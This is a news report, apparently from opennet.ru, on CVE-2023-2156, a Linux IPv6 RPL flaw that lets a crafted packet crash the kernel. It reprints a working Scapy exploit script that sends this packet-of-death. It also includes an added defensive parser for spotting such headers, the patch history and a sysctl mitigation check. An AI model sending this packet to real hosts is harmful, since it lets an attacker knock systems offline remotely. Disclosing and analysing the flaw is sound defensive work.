Zero-day vulnerability in the Linux IPv6 stack allows a remote kernel crash

Details have been disclosed of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel that allows the system to be halted by sending a specially crafted IPv6 packet (packet-of-death). The problem only manifests when support for the Routing Protocol for Low-Power and Lossy Networks (RPL) is enabled. RPL is disabled by default in distributions and is mostly used on embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, which leads to an assertion failure and a kernel panic. When the data obtained from parsing the IPv6 RPL packet header is placed into the sk_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field is set to 1, and the CmprE field is set to 0, the 48-byte address vector is unpacked to 528 bytes, so the memory allocated for the buffer is insufficient. In this case the skb_push function, which is used to place data into the structure, detects the mismatch between the data size and the buffer size and triggers a panic to prevent a write beyond the buffer's bounds.

Example exploit:

    # We'll use Scapy to craft the packet
    from scapy.all import *
    import socket
    import sys

    # Use the IPv6 address from your LAN interface
    DST_ADDR = sys.argv[1]
    SRC_ADDR = DST_ADDR

    # We use sockets to send the packet
    sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

    # Craft the packet
    #   Type = 3 makes this an RPL packet
    #   Addresses contains 3 addresses, but because CmprI is 15,
    #   each octet of the first two addresses is treated as a compressed address
    #   Segleft = 1 to trigger the expansion
    #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
    p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

    # Send this malicious packet
    sockfd.sendto(bytes(p), (DST_ADDR, 0))
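The size arithmetic behind the 48-to-528-byte expansion, as an added example that is not from the original article or from the kernel source: a parser for the RPL source routing header that applies the address-count formula from RFC 6554 and flags headers whose decompressed address vector far exceeds the received one. The function name, the MAX_EXPANSION threshold and the sample bytes are assumptions constructed for illustration.

```python
import struct

RPL_SRH_TYPE = 3      # Routing Type of the RPL Source Route Header (RFC 6554)
MAX_EXPANSION = 4     # assumed alert threshold: decompressed/compressed size ratio

def parse_rpl_srh(hdr: bytes) -> dict:
    """Parse a raw IPv6 routing header and size its decompressed address vector."""
    if len(hdr) < 8:
        raise ValueError("routing header shorter than 8 bytes")
    _nexthdr, hdrlen, rtype, segleft, cmpr, pad_rsv = struct.unpack_from("!6B", hdr)
    if rtype != RPL_SRH_TYPE:
        raise ValueError("not an RPL source route header")
    cmpri, cmpre, pad = cmpr >> 4, cmpr & 0x0F, pad_rsv >> 4
    vec_len = hdrlen * 8                  # compressed address vector, in bytes
    if len(hdr) < 8 + vec_len:
        raise ValueError("truncated header")
    # RFC 6554: n = ((HdrExtLen*8 - Pad - (16 - CmprE)) / (16 - CmprI)) + 1
    body = vec_len - pad - (16 - cmpre)
    if body < 0 or body % (16 - cmpri):
        raise ValueError("inconsistent length/compression fields")
    n = body // (16 - cmpri) + 1
    full = n * 16                         # every address restored to 16 bytes
    return {"cmpri": cmpri, "cmpre": cmpre, "segleft": segleft, "addresses": n,
            "compressed": vec_len, "decompressed": full,
            # Conditions named in the article: Segleft set and a large expansion
            "suspicious": segleft > 0 and full > vec_len * MAX_EXPANSION}

# Constructed samples (not captured traffic): header fields plus zeroed address bytes.
SAMPLE_FLAGGED = bytes([59, 6, 3, 1, 0xF0, 0, 0, 0]) + bytes(48)
SAMPLE_BENIGN = bytes([59, 4, 3, 1, 0x00, 0, 0, 0]) + bytes(32)

if __name__ == "__main__":
    for name, raw in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(name, parse_rpl_srh(raw))
```

With CmprI = 15 every byte of the first 32 bytes counts as one compressed address, which gives 33 addresses and 33 × 16 = 528 bytes after decompression.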

Notably, the kernel developers were notified of the vulnerability back in January 2022 and tried to fix it three times over the past 15 months, releasing patches in September 2022, October 2022, and April 2023. Each time, however, the fix proved insufficient and the vulnerability could still be reproduced. In the end, the ZDI project, which coordinated the work on fixing the vulnerability, decided to publish detailed information about it without waiting for a working fix to appear in the kernel.

As a result, the vulnerability remains unpatched. The patch included in kernel 6.4-rc2 is also ineffective. Users are advised to make sure that the RPL protocol is not in use on their systems, which can be checked with the command sysctl -a | grep -i rpl_seg_enabled

Source: opennet.ru
